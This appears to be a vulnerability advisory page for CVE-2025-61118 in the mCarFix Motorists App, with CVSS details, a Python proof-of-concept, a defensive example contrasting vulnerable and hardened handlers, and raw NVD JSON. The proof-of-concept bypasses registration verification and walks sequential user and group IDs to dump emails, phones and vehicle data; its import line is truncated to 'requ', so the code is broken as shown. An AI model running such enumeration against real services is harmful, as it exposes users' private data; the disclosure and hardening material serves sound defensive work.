Security Vulnerability Report
CVE-2025-61118 CVSS 7.5 HIGH

Published: 2025-10-30 16:15:37
Last Modified: 2026-04-15 00:35:42

Description

mCarFix Motorists App version 2.3 (package name com.skytop.mcarfix), developed by Paniel Mwaura, contains improper access control vulnerabilities. Attackers may bypass verification to arbitrarily register accounts, and by tampering with sequential numeric IDs, gain unauthorized access to user data and groups. Successful exploitation could result in fake account creation, privacy breaches, and misuse of the platform.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

This 7.5 is a Secondary (CNA-supplied) score; the NVD record is in Deferred status, so no NVD primary analysis or score exists. The vector rates confidentiality only (C:H, I:N, A:N): the arbitrary account creation described above is an integrity impact the score does not reflect, so treat the rating as a floor when prioritising.

Configurations (Affected Products)

No CPE configuration data has been published for this record. The affected product named in the description is mCarFix Motorists App v2.3 (Android package com.skytop.mcarfix).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61118 PoC - mCarFix Motorists App Access Control Bypass
# Author: Security Researcher
# Description: Exploits improper access control in mCarFix Motorists App v2.3
#
# The endpoint paths, parameter names and response fields below are the PoC
# author's placeholders; the advisory itself only states that verification can
# be bypassed and that user/group IDs are sequential. Replace them with the
# values observed when intercepting the app's own traffic.
import json

import requ

TARGET_HOST = "http://target-app.com"  # Replace with actual target
TIMEOUT = 10  # seconds; avoid hanging on an unresponsive host


def exploit_registration_bypass():
    """
    Step 1: Bypass registration verification to create arbitrary accounts
    """
    print("[+] Step 1: Exploiting registration bypass...")
    # Original registration request (intercepted)
    registration_endpoint = f"{TARGET_HOST}/api/v1/user/register"
    # Payload to bypass verification
    payload = {
        "username": "attacker_account",
        "email": "[email protected]",
        "password": "Password123!",
        "verification_code": "",  # Bypass by removing/emptying verification
        "phone": "+1234567890",
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Dalvik/2.1.0 (Linux; U; Android 11)",
    }
    try:
        response = requests.post(registration_endpoint, json=payload, headers=headers, timeout=TIMEOUT)
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Account created successfully: {data}")
            return data.get("user_id")
        print(f"[-] Registration failed: {response.status_code}")
        return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def exploit_idor_access(start_id, end_id):
    """
    Step 2: Exploit IDOR by tampering sequential numeric IDs to access user data
    """
    print(f"[+] Step 2: Exploiting IDOR vulnerability (ID range: {start_id}-{end_id})...")
    user_data_endpoint = f"{TARGET_HOST}/api/v1/user/profile"
    # No session token is sent: the PoC assumes the endpoint serves any id
    # unauthenticated (consistent with PR:N in the vector). If the target
    # requires a session, attach the token returned by step 1.
    for user_id in range(start_id, end_id + 1):
        try:
            # Tamper with user_id parameter
            params = {"user_id": user_id}
            response = requests.get(user_data_endpoint, params=params, timeout=TIMEOUT)
            if response.status_code == 200:
                data = response.json()
                print(f"[+] Found user data - ID {user_id}: {json.dumps(data, indent=2)}")
                # Extract sensitive information
                if "email" in data:
                    print(f"    Email: {data['email']}")
                if "phone" in data:
                    print(f"    Phone: {data['phone']}")
                if "vehicle_info" in data:
                    print(f"    Vehicle: {data['vehicle_info']}")
        except Exception as e:
            print(f"[-] Error accessing ID {user_id}: {e}")


def exploit_group_access():
    """
    Step 3: Access unauthorized group data via IDOR
    """
    print("[+] Step 3: Exploiting group IDOR vulnerability...")
    group_endpoint = f"{TARGET_HOST}/api/v1/group/info"
    for group_id in range(1, 100):
        try:
            params = {"group_id": group_id}
            response = requests.get(group_endpoint, params=params, timeout=TIMEOUT)
            if response.status_code == 200:
                data = response.json()
                print(f"[+] Found group - ID {group_id}: {data.get('name', 'Unknown')}")
                print(f"    Members: {data.get('member_count', 0)}")
        except Exception:
            # Errors on individual ids are not interesting; keep walking the range
            continue


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-61118 PoC - mCarFix Motorists App Exploitation")
    print("=" * 60)
    # Execute attack chain
    user_id = exploit_registration_bypass()
    if user_id:
        # Access other users' data
        exploit_idor_access(1, 50)
        # Access group information
        exploit_group_access()
    print("\n[!] PoC execution completed. Target may be compromised.")
```
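The PoC above depends on two server-side gaps: a registration handler that lets an empty verification code through, and profile/group lookups keyed on a client-supplied numeric ID with no ownership or membership check (CWE-284). The block below is an added example, not code from the mCarFix app, the advisory, or the PoC author: an in-memory model of each handler in its vulnerable form beside a hardened form (a server-held, single-use, expiring code compared in constant time; the profile target derived from the session; group access gated on membership), plus a `replay_poc()` that runs the PoC's three steps against both variants. The fixture users and groups, field names, and the exact shape of the registration bug are constructed assumptions.

```python
# Added example, not the app's code: vulnerable vs hardened handlers for the
# two CWE-284 gaps in CVE-2025-61118. Fixtures, field names and the exact
# shape of the registration bug are constructed assumptions.
import hmac
import secrets
import time


def _fixture_users():
    # Constructed data: two pre-existing users with sequential ids.
    return {
        1: {"id": 1, "email": "alice@example.test", "phone": "+100000001", "groups": {10}},
        2: {"id": 2, "email": "bob@example.test", "phone": "+100000002", "groups": {11}},
    }


USERS = _fixture_users()
GROUPS = {10: {"id": 10, "name": "group-A"}, 11: {"id": 11, "name": "group-B"}}
PENDING_CODES = {}  # phone -> (code, expiry): the server's copy of the SMS code


def issue_verification_code(phone, ttl=300):
    """Server-side record of the code sent by SMS; the API never returns it to the client."""
    code = f"{secrets.randbelow(10 ** 6):06d}"
    PENDING_CODES[phone] = (code, time.time() + ttl)
    return code


def _create_user(req):
    new_id = max(USERS) + 1  # sequential numeric id, as the advisory describes
    USERS[new_id] = {"id": new_id, "email": req["email"], "phone": req["phone"], "groups": set()}
    return new_id


def register_vulnerable(req):
    """Assumed bug shape: the code is validated only if the client sends one."""
    code = req.get("verification_code")
    if code and code != PENDING_CODES.get(req.get("phone"), (None, 0))[0]:
        return 400, None
    return 200, _create_user(req)


def register_hardened(req):
    """A code must exist server-side, be unexpired, match in constant time, and is single-use."""
    entry = PENDING_CODES.pop(req.get("phone"), None)  # a wrong guess burns the code
    supplied = (req.get("verification_code") or "").encode()
    if entry is None:
        return 400, None
    code, expiry = entry
    if time.time() > expiry or not hmac.compare_digest(supplied, code.encode()):
        return 400, None
    return 200, _create_user(req)


def profile_vulnerable(req):
    """IDOR: any user_id is served; the caller's identity is never consulted."""
    user = USERS.get(req.get("user_id"))
    return (200, user) if user else (404, None)


def profile_hardened(session_user_id, req):
    """The target comes from the session; a mismatching user_id gets a uniform 403."""
    target = req.get("user_id", session_user_id)
    if session_user_id not in USERS or target != session_user_id:
        return 403, None
    return 200, USERS[session_user_id]


def group_vulnerable(req):
    group = GROUPS.get(req.get("group_id"))
    return (200, group) if group else (404, None)


def group_hardened(session_user_id, req):
    """Membership check: a guessable group id is harmless when this holds."""
    gid = req.get("group_id")
    if session_user_id not in USERS or gid not in USERS[session_user_id]["groups"]:
        return 403, None
    return 200, GROUPS[gid]


def replay_poc():
    """Run the PoC's three steps against both variants from a fresh fixture; return a summary."""
    USERS.clear()
    USERS.update(_fixture_users())
    PENDING_CODES.clear()
    attacker = {"email": "attacker@example.test", "phone": "+19999", "verification_code": ""}
    vuln_reg, _ = register_vulnerable(dict(attacker))  # empty code accepted
    hard_reg, _ = register_hardened(dict(attacker))  # no pending code -> 400
    real_code = issue_verification_code("+18888")  # legitimate SMS step
    legit_reg, legit_uid = register_hardened(
        {"email": "carol@example.test", "phone": "+18888", "verification_code": real_code})
    return {
        "vuln_register": vuln_reg,
        "hard_register_empty_code": hard_reg,
        "hard_register_real_code": legit_reg,
        "legit_uid": legit_uid,
        # Sequential-id walk, as the PoC does; the hardened side runs as user 1's session.
        "vuln_profiles_leaked": [u for u in range(1, 5) if profile_vulnerable({"user_id": u})[0] == 200],
        "hard_profiles_served_as_user1": [u for u in range(1, 5) if profile_hardened(1, {"user_id": u})[0] == 200],
        "vuln_groups_leaked": [g for g in range(1, 20) if group_vulnerable({"group_id": g})[0] == 200],
        "hard_groups_served_as_user1": [g for g in range(1, 20) if group_hardened(1, {"group_id": g})[0] == 200],
    }


if __name__ == "__main__":
    for key, value in replay_poc().items():
        print(f"{key}: {value}")
```

Two design points worth noting: the hardened profile handler returns the same 403 whether the requested id exists or not, so an enumeration loop learns nothing about the id space; and switching to random, non-sequential identifiers would only slow the walk, whereas the session-derived ownership check and the group membership check close it regardless of how guessable the ids are.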

References

https://kar1oz.notion.site/mCarFix-Motorists-App-2629a473ecb280ac8679c73098423cf0 (reporter's write-up, the only reference listed in the NVD record)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61118",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-30T16:15:36.517",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "mCarFix Motorists App version 2.3 (package name com.skytop.mcarfix), developed by Paniel Mwaura, contains improper access control vulnerabilities. Attackers may bypass verification to arbitrarily register accounts, and by tampering with sequential numeric IDs, gain unauthorized access to user data and groups. Successful exploitation could result in fake account creation, privacy breaches, and misuse of the platform."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://kar1oz.notion.site/mCarFix-Motorists-App-2629a473ecb280ac8679c73098423cf0",
        "source": "[email protected]"
      }
    ]
  }
}
```